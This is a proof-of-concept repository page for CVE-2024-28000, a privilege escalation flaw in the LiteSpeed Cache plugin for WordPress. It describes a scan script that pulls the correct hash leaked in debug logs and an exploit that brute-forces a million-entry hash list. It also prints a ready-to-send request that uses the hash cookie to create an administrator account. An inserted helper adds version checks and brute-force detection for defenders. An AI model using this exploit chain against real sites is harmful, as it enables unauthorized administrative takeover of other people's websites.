CVE-2024-28000 PoC: WordPress Plugin LiteSpeed Cache security vulnerability

Associated Vulnerability
Title: WordPress Plugin LiteSpeed Cache security vulnerability (CVE-2024-28000)
Description: WordPress and WordPress plugins are products of the WordPress Foundation. WordPress is a blogging platform written in PHP that lets you host a personal blog on a server running PHP and MySQL; a WordPress plugin is an add-on application for it. WordPress Plugin LiteSpeed Cache 6.3.0.1 and earlier contain a security vulnerability caused by incorrect privilege assignment, which allows privilege escalation.
Description
CVE-2024-28000 LiteSpeed Cache Privilege Escalation Scan&Exp
Readme
# LiteSpeed Cache Privilege Escalation Exp

## CVE-2024-28000_Scan.py
- The script first fingerprints the plugin version and checks whether it is an affected release, then tries to confirm that the debug log file exists. If it does, it sends a request and fetches the log again, looking for a leaked hash: when LiteSpeed debug logging is enabled, the correct hash may be disclosed in the log.
```
usage: CVE-2024-28000_Scan.py [-h] [-f F] [-t T] [-p PROXY]

CVE-2024-28000 Scan

optional arguments:
  -h, --help            show this help message and exit
  -f F                  File list
  -t T                  Scan thread
  -p PROXY, --proxy PROXY
                        Example: socks5://127.0.0.1:10808
```
Example:
```
09/08/24 16:30:38.219 [0.0.0.0:26008 1 TG9] 💓 ------POST HTTP/1.1 (HTTPS)  /wp-json/wp/v2/users
09/08/24 16:30:38.219 [0.0.0.0:26008 1 TG9] Query String: 
09/08/24 16:30:38.231 [0.0.0.0:26008 1 TG9] [Router] starting role validation
09/08/24 16:30:38.232 [0.0.0.0:26008 1 TG9] [Router] hash not match zasws5 != pkHrfD
09/08/24 16:30:38.232 [0.0.0.0:26008 1 TG9] [Router] get_role: 
09/08/24 16:30:38.241 [0.0.0.0:26008 1 TG9] [Optm] init
```
If LiteSpeed debug logging is enabled you may see log lines like the ones above; the value on the right-hand side of `!=` (here `pkHrfD`) is the correct hash, while the left-hand value is the one the client submitted.
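The two checks the scan step relies on, as an added offline example (this is not code from the CVE-2024-28000 PoC repository): a version test against the affected range stated in the advisory text above (6.3.0.1 and earlier), and a parser for the `[Router] hash not match <submitted> != <expected>` debug-log lines that extracts the expected hash the scanner is after. The same parser gives a defender the opposite view, counting failed hash checks per client IP to spot a hash brute force. Assumptions not stated on the page: the version is read from the `Stable tag:` line of the plugin's public readme.txt, and the sample log is constructed from the lines shown above plus three made-up attempts from a second client address.

```python
# Added example, not part of the original PoC. Offline helpers for the two
# checks described in the scan section: affected-version test and extraction of
# the expected hash from LiteSpeed debug-log "hash not match" lines, plus a
# per-IP counter of failed checks for the defender side.
import re
from collections import Counter
from typing import Optional

LAST_VULNERABLE = (6, 3, 0, 1)  # "6.3.0.1 and earlier" per the advisory text above

# Matches e.g. "[0.0.0.0:26008 1 TG9] [Router] hash not match zasws5 != pkHrfD"
_HASH_MISMATCH = re.compile(
    r"\[(?P<ip>[^\]:\s]+):\d+[^\]]*\] \[Router\] hash not match "
    r"(?P<submitted>\S+) != (?P<expected>\S+)"
)
# Assumption: version comes from the "Stable tag:" line of the plugin readme.txt
_STABLE_TAG = re.compile(r"^Stable tag:\s*(\S+)", re.MULTILINE | re.IGNORECASE)

# Constructed sample inputs (not captured from a real site).
SAMPLE_README = "=== LiteSpeed Cache ===\nStable tag: 6.3.0.1\n"
SAMPLE_LOG = """\
09/08/24 16:30:38.219 [0.0.0.0:26008 1 TG9] ------POST HTTP/1.1 (HTTPS)  /wp-json/wp/v2/users
09/08/24 16:30:38.231 [0.0.0.0:26008 1 TG9] [Router] starting role validation
09/08/24 16:30:38.232 [0.0.0.0:26008 1 TG9] [Router] hash not match zasws5 != pkHrfD
09/08/24 16:30:38.232 [0.0.0.0:26008 1 TG9] [Router] get_role: 
09/08/24 16:30:39.101 [203.0.113.7:51022 2 TG9] [Router] hash not match aaaaaa != pkHrfD
09/08/24 16:30:39.140 [203.0.113.7:51023 2 TG9] [Router] hash not match aaaaab != pkHrfD
09/08/24 16:30:39.180 [203.0.113.7:51024 2 TG9] [Router] hash not match aaaaac != pkHrfD
"""


def parse_version(version: str) -> tuple:
    """Turn '6.3.0.1' into (6, 3, 0, 1); tuple comparison handles shorter forms like '6.3'."""
    return tuple(int(part) for part in version.strip().split("."))


def is_vulnerable_version(version: str) -> bool:
    """True when the plugin version lies in the affected range (<= 6.3.0.1)."""
    return parse_version(version) <= LAST_VULNERABLE


def version_from_readme(readme_text: str) -> Optional[str]:
    """Read the plugin version from a readme.txt 'Stable tag:' line (assumed source)."""
    m = _STABLE_TAG.search(readme_text)
    return m.group(1) if m else None


def hash_mismatches(log_text: str) -> list:
    """All (client_ip, submitted_hash, expected_hash) triples found in the log."""
    found = []
    for line in log_text.splitlines():
        m = _HASH_MISMATCH.search(line)
        if m:
            found.append((m.group("ip"), m.group("submitted"), m.group("expected")))
    return found


def leaked_correct_hash(log_text: str) -> Optional[str]:
    """The hash the plugin expected, i.e. the value the scanner is looking for.
    If the log holds more than one expected value, the most frequent one wins."""
    expected = Counter(exp for _, _, exp in hash_mismatches(log_text))
    return expected.most_common(1)[0][0] if expected else None


def flag_bruteforce(log_text: str, threshold: int = 50) -> dict:
    """Defender view: client IPs with at least `threshold` failed hash checks."""
    per_ip = Counter(ip for ip, _, _ in hash_mismatches(log_text))
    return {ip: n for ip, n in per_ip.items() if n >= threshold}


if __name__ == "__main__":
    ver = version_from_readme(SAMPLE_README)
    state = "affected" if ver and is_vulnerable_version(ver) else "not affected"
    print(f"plugin version {ver}: {state}")
    print("expected hash leaked in debug log:", leaked_correct_hash(SAMPLE_LOG))
    print("clients over threshold:", flag_bruteforce(SAMPLE_LOG, threshold=2))
```

Feed `hash_mismatches` a real debug log to see how many distinct clients are hammering the role check; a single client producing thousands of `hash not match` lines against the same expected value is exactly the hash enumeration the exploit script below performs.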
## CVE-2024-28000_Exploit.py
- Testing showed that hashes generated by Python and by PHP differ, so the hash list cannot be produced by re-implementing the generator in Python. Hash_list.txt contains 1,000,000 hashes generated with PHP, so in theory the correct hash is reached after at most 1,000,000 attempts.
```
usage: CVE-2024-28000_Exploit.py [-h] [-u U] [-t T] [-d D] [-p PROXY]

CVE-2024-28000

optional arguments:
  -h, --help            show this help message and exit
  -u U                  url
  -t T                  Scan thread
  -d D                  Dict list
  -p PROXY, --proxy PROXY
                        Example: socks5://127.0.0.1:10808
```
- `-d` is the hash list, `-u` the target URL and `-t` the thread count; keep the thread count low.

## Testing
- In a lab environment the hash was enumerated successfully, and after five reinstalls the hash was each time confirmed to be present in the generated hash list; however, several factors make the success rate in real-world use low.
- Once the correct hash has been found, the following request adds an admin user:

```
POST /wp-json/wp/v2/users HTTP/2
Host: xxx.com
User-Agent: python-requests/2.28.1
Accept-Encoding: gzip, deflate, br
Accept: */*
Cookie: litespeed_hash=<correct hash>; litespeed_role=1
Content-Length: 108
Content-Type: application/json

{"username": "username", "password": "password", "email": "xadminx@example.com", "roles": ["administrator"]}
```
File Snapshot

```
[4.0K] /data/pocs/7b4d57850a98d765b621eefcbf1abd5c7de4ca9b
├── [3.3K] CVE-2024-28000_Exploit.py
├── [6.6K] CVE-2024-28000_Scan.py
├── [6.7M] Hash_list.txt
├── [2.4K] README.md
└── [  81] requirements.txt

0 directories, 5 files
```